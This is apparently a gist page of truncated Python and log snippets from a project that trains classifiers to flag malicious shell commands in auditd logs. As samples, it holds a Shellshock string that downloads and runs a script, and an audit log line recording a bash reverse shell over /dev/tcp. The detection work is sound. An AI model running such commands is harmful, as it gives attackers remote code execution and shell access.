This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def normalizeStringHash(string): | |
string = re.sub(r'[0-9a-fA-F]{64}', "<sha256>", string) | |
string = re.sub(r'[0-9a-fA-F]{40}', "<sha1>", string) | |
string = re.sub(r'[0-9a-fA-F]{32}', "<md5>", string) | |
return string |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
model.zero_grad() # Reset gradients tensors | |
for i, (inputs, labels) in enumerate(training_set): | |
predictions = model(inputs) # Forward pass | |
loss = loss_function(predictions, labels) # Compute loss function | |
loss = loss / accumulation_steps # Normalize our loss (if averaged) | |
loss.backward() # Backward pass | |
if (i+1) % accumulation_steps == 0: # Wait for several backward steps | |
optimizer.step() # Now we can do an optimizer step | |
model.zero_grad() # Reset gradients tensors | |
if (i+1) % evaluation_steps == 0: # Evaluate the model when we... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sklearn.neural_network import MLPClassifier | |
X_full_dataset = [...] | |
y_full_dataset = [...] | |
mlpModel = MLClassifier( | |
hidden_layer_sizes=(128,64) | |
) | |
mlpModel.fit(full_dataset, y) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sklearn.metrics import roc_curve, det_curve | |
def get_threshold_from_rate(thresholds, rate_array, rate): | |
index = np.where(rate_array >= rate)[0][0] | |
return thresholds[index] | |
def get_value_from_threshold(values, thresholds, threshold): | |
try: | |
thr_index = np.where(thresholds <= threshold)[0][0] | |
except IndexError: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from xgboost import XGBClassifier | |
xgb_model = XGBClassifier(n_estimators=100, use_label_encoder=False, eval_metric="logloss") | |
xgb_model.fit( | |
X["HashingVectorizer"], y | |
) | |
shellshock_backdoor = "() { :;}; /bin/bash -c 'curl -O /tmp/foo.sh example.com/test; nohup bash /tmp/foo.sh &'" | |
print(xgb_model.predict_proba( | |
hvwpt.transform([shellshock_backdoor]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sklearn.model_selection import cross_validate | |
from sklearn.model_selection import StratifiedKFold | |
def print_scores(cv): | |
means = np.mean(list(cv.values()), axis=1) | |
[print(f"\tAverage {x[0].strip('test_'):<10} over all folds: {x[1]:.2f}") for x in zip(cv.keys(), means) if "test_" in x[0]] | |
print() | |
cv = {} | |
metrics = ["accuracy", "precision", "recall", "f1", "roc_auc"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
type=EXECVE msg=audit(1648469217.476:296): argc=2 a0="readlink" a1="/usr/bin/python" | |
type=EXECVE msg=audit(1648469217.484:298): argc=4 a0="grep" a1="-q" a2="^ID.*=.*ubuntu" a3="/etc/os-release" | |
type=EXECVE msg=audit(1648469217.512:299): argc=3 a0="tput" a1="setaf" a2="1" | |
type=EXECVE msg=audit(1648469218.312:300): argc=4 a0="/bin/sh" a1="-c" a3="/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261" | |
type=EXECVE msg=audit(1648469219.440:302): argc=3 a0="/usr/lib/x86_64-linux-gnu/utempter/utempter" a1="add" a2="tmux(3353).%1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import re | |
from nltk.tokenize import WordPunctTokenizer | |
from sklearn.feature_extraction.text import HashingVectorizer | |
wpt = WordPunctTokenizer() | |
hvwpt = HashingVectorizer( | |
preprocessor=lambda x: re.sub(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", "_IPADDRESS_", x), | |
tokenizer=wpt.tokenize, | |
token_pattern=None, | |
lowercase=False, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"program_name": "auditbeat", | |
"hostname": "k8s-minikube", | |
"...", | |
"auditd": { | |
"message_type": "syscall", | |
"summary": { | |
"actor": { | |
"primary": "root", | |
"secondary": "root" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import random | |
import string | |
import time | |
def get_random_ip(octets=4): | |
return ".".join(map(str, (random.randint(0, 255) for _ in range(octets)))) | |
def get_random_string(length=10): | |
return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(length)) |
NewerOlder